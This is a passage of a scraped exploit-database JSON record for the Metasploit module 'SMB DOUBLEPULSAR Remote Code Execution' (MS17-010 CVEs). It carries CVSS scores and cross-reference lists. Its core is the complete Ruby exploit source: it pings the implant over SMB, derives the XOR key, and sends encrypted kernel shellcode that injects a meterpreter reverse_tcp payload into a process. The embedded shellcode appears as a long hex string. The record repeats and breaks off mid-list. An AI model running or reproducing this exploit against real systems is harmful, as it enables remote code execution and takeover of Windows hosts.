Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T22:12:16", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-03T22:12:16", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-03T22:12:16", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-04] #"}, "lastseen": "2021-09-03T22:12:16", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "bcf488fe0500cf68e5b81579b30ae626", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-04T22:15:58", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 